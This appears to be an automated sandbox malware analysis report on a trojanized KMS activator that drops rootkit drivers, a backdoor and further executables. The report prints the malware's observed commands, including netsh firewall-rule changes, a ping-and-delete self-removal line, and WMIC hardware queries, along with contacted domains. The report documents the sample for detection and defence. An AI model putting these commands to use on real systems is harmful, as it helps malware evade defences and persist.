Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeCode function: 4_2_00D5A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00D5A2D5
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037C06F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0037C06F
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037C1D1 SetUnhandledExceptionFilter,11_2_0037C1D1
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037BC98 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0037BC98
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00380649 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00380649
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB9149 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00EB9149
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB5288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00EB5288
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB53EA SetUnhandledExceptionFilter,17_2_00EB53EA
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB4C8D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00EB4C8D
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046E6AA SetUnhandledExceptionFilter,34_2_0046E6AA
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046E6BC SetUnhandledExceptionFilter,34_2_0046E6BC
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic BaseBoard get SerialNumberJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1Jump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe "C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -installJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c set "path=%systemroot%;%systemroot%\system32;%systemroot%\system32\wbem;%systemroot%\system32\windowspowershell\v1.0\;" & netsh advfirewall firewall add rule name="heu_kms_activator" dir=in action=allow profile=any program="c:\users\user\appdata\local\temp\heu_kms_activator.exe"
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c set "path=%systemroot%;%systemroot%\system32;%systemroot%\system32\wbem;%systemroot%\system32\windowspowershell\v1.0\;" & netsh advfirewall firewall add rule name="heu_kms_activator" dir=in action=allow profile=any program="c:\users\user\appdata\local\temp\heu_kms_activator.exe"Jump to behavior
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HEU_KMS_Activator.exe, 00000004.00000002.2511304287.0000000001BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: HEU_KMS_Activator.exe, 00000004.00000002.2511304287.0000000001BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager":
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C0463 cpuid 2_2_006C0463
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_006E2476
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: EnumSystemLocalesW,2_2_006E2763
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: EnumSystemLocalesW,2_2_006E2718
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: EnumSystemLocalesW,2_2_006E27FE
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_006E2889
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetLocaleInfoW,2_2_006E2ADC
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_006E2C02
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetLocaleInfoW,2_2_006E2D08
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_006E2DD7
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: EnumSystemLocalesW,2_2_006DB041
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: GetLocaleInfoW,2_2_006DB5A3
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00CA2476
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: EnumSystemLocalesW,3_2_00CA27FE
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: EnumSystemLocalesW,3_2_00CA2763
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: EnumSystemLocalesW,3_2_00CA2718
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00CA2889
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetLocaleInfoW,3_2_00CA2ADC
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00CA2C02
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00CA2DD7
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetLocaleInfoW,3_2_00CA2D08
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: EnumSystemLocalesW,3_2_00C9B041
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: GetLocaleInfoW,3_2_00C9B5A3
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetLocaleInfoW,11_2_0039995F
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00399A85
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_003992F9
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetLocaleInfoW,11_2_00390B1C
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetLocaleInfoW,11_2_00399B8B
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00399C5A
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: EnumSystemLocalesW,11_2_0039959B
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: EnumSystemLocalesW,11_2_003905FA
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: EnumSystemLocalesW,11_2_003995E6
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: EnumSystemLocalesW,11_2_00399681
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0039970C
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C066B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_006C066B
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DBD85 _free,_free,_free,GetTimeZoneInformation,_free,2_2_006DBD85
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004060EC GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_004060EC

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c set "Path=%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;" & netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall delete rule name="HEU_KMS_Activator"
Source: svchost.exe, 0000001F.00000002.2509619289.000001F3C1B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: svchost.exe, 0000001F.00000002.2509619289.000001F3C1B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drBinary or memory string: 360Tray.exe
Source: DvLayout.exe, 0000000B.00000002.1275773216.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ccenter.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0068C000 bind,WSAGetLastError,@_RTC_CheckStackVars@8,2_2_0068C000
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00665120 _strlen,_strlen,_strlen,_strlen,_strlen,___from_strstr_to_strchr,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,htons,htons,WSAGetLastError,@_RTC_CheckStackVars@8,2_2_00665120
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0067D2A0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,_strlen,send,recv,_memcmp,closesocket,closesocket,closesocket,closesocket,@_RTC_CheckStackVars@8,2_2_0067D2A0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0069BA80 _strlen,_strlen,_strlen,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,getsockname,WSAGetLastError,WSAGetLastError,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,@_RTC_CheckStackVars@8,2_2_0069BA80
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C3D2A0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,_strlen,send,recv,_memcmp,closesocket,closesocket,closesocket,closesocket,@_RTC_CheckStackVars@8,3_2_00C3D2A0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C4C000 bind,WSAGetLastError,@_RTC_CheckStackVars@8,3_2_00C4C000
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C25120 _strlen,_strlen,_strlen,_strlen,_strlen,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,htons,htons,WSAGetLastError,@_RTC_CheckStackVars@8,3_2_00C25120
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C5BA80 _strlen,_strlen,_strlen,_strncpy,_strcat,_strncpy,_strcat,getsockname,WSAGetLastError,WSAGetLastError,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,@_RTC_CheckStackVars@8,3_2_00C5BA80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E8FE00 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,17_2_00E8FE00
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E982B3 bind,WSAGetLastError,17_2_00E982B3
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E81370 ___from_strstr_to_strchr,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,17_2_00E81370
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E984C0 bind,WSAGetLastError,17_2_00E984C0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EA1B70 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,17_2_00EA1B70

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		31
Disable or Modify Tools		11
Input Capture		12
System Time Discovery		1
Exploitation of Remote Services		12
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts13
Native API		24
Windows Service		24
Windows Service		1
Deobfuscate/Decode Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol11
Input Capture		21
Encrypted Channel		Exfiltration Over Bluetooth1
System Shutdown/Reboot
Email AddressesDNS ServerDomain Accounts13
Command and Scripting Interpreter		1
Bootkit		12
Process Injection		3
Obfuscated Files or Information		Security Account Manager56
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts12
Service Execution		Login HookLogin Hook1
Software Packing		NTDS281
Security Software Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets14
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
Masquerading		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job14
Virtualization/Sandbox Evasion		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadow11
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Bootkit		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480974 Sample: HEU_KMS_Activator.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 100 www.wshifen.com 2->100 102 www.baidu.com 2->102 104 5 other IPs or domains 2->104 124 Multi AV Scanner detection for domain / URL 2->124 126 Antivirus detection for URL or domain 2->126 128 Antivirus detection for dropped file 2->128 130 8 other signatures 2->130 9 HEU_KMS_Activator.exe 36 2->9         started        13 J8156NOVDEC.exe 13 2->13         started        16 svchost.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 dnsIp5 92 C:\Windows\System32\...\KMDF_Protect.sys, PE32+ 9->92 dropped 94 C:\Windows\System32\drivers\KMDF_LOOK.sys, PE32+ 9->94 dropped 96 C:\Windows\System32\drivers\DvLayout.exe, PE32 9->96 dropped 98 7 other files (6 malicious) 9->98 dropped 146 Binary is likely a compiled AutoIt script file 9->146 148 Drops executables to the windows directory (C:\Windows) and starts them 9->148 150 Sample is not signed and drops a device driver 9->150 20 HEU_KMS_Activator.exe 31 9->20         started        24 _J8156NOVDEC.exe 2 9->24         started        26 DvLayout.exe 11 3 9->26         started        114 www.wshifen.com 103.235.46.96, 49699, 80 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd Hong Kong 13->114 152 Antivirus detection for dropped file 13->152 154 Multi AV Scanner detection for dropped file 13->154 156 Contains functionality to infect the boot sector 13->156 28 WMIC.exe 13->28         started        158 Changes security center settings (notifications, updates, antivirus, firewall) 16->158 30 MpCmdRun.exe 16->30         started        160 Query firmware table information (likely to detect VMs) 18->160 file6 signatures7 process8 file9 80 C:\Windows\...\HEU_KMS_Activator.exe, PE32 20->80 dropped 82 C:\Users\user\AppData\Local\...\autC8A0.tmp, 7-zip 20->82 dropped 84 C:\Windows\_temp07242019502489\7Z.EXE, PE32 20->84 dropped 132 Multi AV Scanner detection for dropped file 20->132 134 Binary is likely a compiled AutoIt script file 20->134 136 Machine Learning detection for dropped file 20->136 144 2 other signatures 20->144 32 7Z.EXE 20->32         started        36 kms_x64.exe 20->36         started        38 cmd.exe 20->38         started        51 6 other processes 20->51 86 C:\Users\user\AppData\...\J8156NOVDEC.exe, PE32 24->86 dropped 138 Antivirus detection for dropped file 24->138 140 Contains functionality to infect the boot sector 24->140 40 cmd.exe 1 24->40         started        88 C:\Windows\system32\...\mvtnom.sys (copy), PE32+ 26->88 dropped 90 C:\Windows\...\CbDServices.sys (copy), PE32+ 26->90 dropped 142 Uses powercfg.exe to modify the power settings 26->142 42 powercfg.exe 26->42         started        44 wrme.exe 26->44         started        47 conhost.exe 28->47         started        49 conhost.exe 30->49         started        signatures10 process11 dnsIp12 72 C:\Windows\...\cleanospp.exe, PE32 32->72 dropped 74 C:\Windows\...\SppExtComObjHook.dll, PE32 32->74 dropped 76 C:\Windows\_temp07242019502489\...\SetACL.exe, PE32 32->76 dropped 78 11 other files (9 malicious) 32->78 dropped 116 Binary is likely a compiled AutoIt script file 32->116 53 conhost.exe 32->53         started        55 conhost.exe 38->55         started        57 netsh.exe 38->57         started        118 Uses ping.exe to sleep 40->118 120 Uses ping.exe to check the status of other devices and networks 40->120 122 Uses netsh to modify the Windows network and firewall settings 40->122 59 PING.EXE 1 40->59         started        62 conhost.exe 40->62         started        64 conhost.exe 42->64         started        108 db.testyk.com 103.224.212.211, 443, 49711 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 44->108 110 da.testiu.com 103.224.212.216, 443, 49708 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 44->110 112 du.testjj.com 72.52.179.174, 443, 49702, 49716 LIQUIDWEBUS United States 44->112 66 conhost.exe 51->66         started        68 conhost.exe 51->68         started        70 5 other processes 51->70 file13 signatures14 process15 dnsIp16 106 127.0.0.1 unknown unknown 59->106

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
HEU_KMS_Activator.exe68%ReversingLabsWin32.Trojan.Generic
HEU_KMS_Activator.exe74%VirustotalBrowse
HEU_KMS_Activator.exe100%AviraTR/Agent.acbe
HEU_KMS_Activator.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe100%AviraTR/Agent.vdqps
C:\Windows\System32\drivers\KMDF_LOOK.sys100%AviraHEUR/AGEN.1303604
C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe100%AviraTR/Agent.vdqps
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe100%AviraRKIT/Agent.xdjdp
C:\Windows\System32\drivers\DvLayout.exe100%AviraTR/Agent.ugoop
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe100%AviraRKIT/Agent.moamk
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe100%AviraTR/Agent.tzwxs
C:\Windows\System32\drivers\KMDF_Protect.sys100%AviraHEUR/AGEN.1303604
C:\Users\user\AppData\Local\Temp\autC8A0.tmp100%Joe Sandbox ML
C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe100%Joe Sandbox ML
C:\Windows\_temp07242019502489\kms.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe71%ReversingLabsWin32.PUA.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe86%ReversingLabsWin32.Trojan.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe58%ReversingLabsWin32.Trojan.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe83%ReversingLabsWin32.Trojan.Kuping
C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe66%ReversingLabsWin32.Hacktool.KmsActivator
C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe87%ReversingLabsWin32.Trojan.SchoolBoy
C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe87%ReversingLabsWin32.Trojan.SchoolBoy
C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dll0%ReversingLabs
C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe66%ReversingLabsWin32.Hacktool.KmsActivator
C:\Windows\System32\drivers\DvLayout.exe69%ReversingLabsWin32.Backdoor.Terbix
C:\Windows\System32\drivers\KMDF_LOOK.sys88%ReversingLabsWin64.Trojan.Kuping
C:\Windows\System32\drivers\KMDF_Protect.sys50%ReversingLabsWin64.Trojan.Starter
C:\Windows\_temp07242019502489\7Z.EXE0%ReversingLabs
C:\Windows\_temp07242019502489\kms-client.exe33%ReversingLabsWin32.Hacktool.AutoKMS
C:\Windows\_temp07242019502489\kms-server.exe49%ReversingLabsWin32.Hacktool.AutoKMS
C:\Windows\_temp07242019502489\kms.exe56%ReversingLabsWin32.Hacktool.KmsActivator
C:\Windows\_temp07242019502489\kms_x64.exe4%ReversingLabs
C:\Windows\_temp07242019502489\x64\SECOPatcher.dll46%ReversingLabsWin64.Hacktool.KMSActivator
C:\Windows\_temp07242019502489\x64\SetACL.exe0%ReversingLabs
C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll0%ReversingLabs
C:\Windows\_temp07242019502489\x64\cleanospp.exe0%ReversingLabs
C:\Windows\_temp07242019502489\x64\msvcr100.dll0%ReversingLabs
C:\Windows\_temp07242019502489\x86\SECOPatcher.dll33%ReversingLabsWin32.Hacktool.KmsAuto
C:\Windows\_temp07242019502489\x86\SetACL.exe0%ReversingLabs
C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll13%ReversingLabs
C:\Windows\_temp07242019502489\x86\cleanospp.exe0%ReversingLabs
C:\Windows\_temp07242019502489\x86\msvcr100.dll0%ReversingLabs
C:\Windows\system32\drivers\CbDServices.sys (copy)50%ReversingLabsWin64.Trojan.Starter
C:\Windows\system32\drivers\mvtnom.sys (copy)88%ReversingLabsWin64.Trojan.Kuping

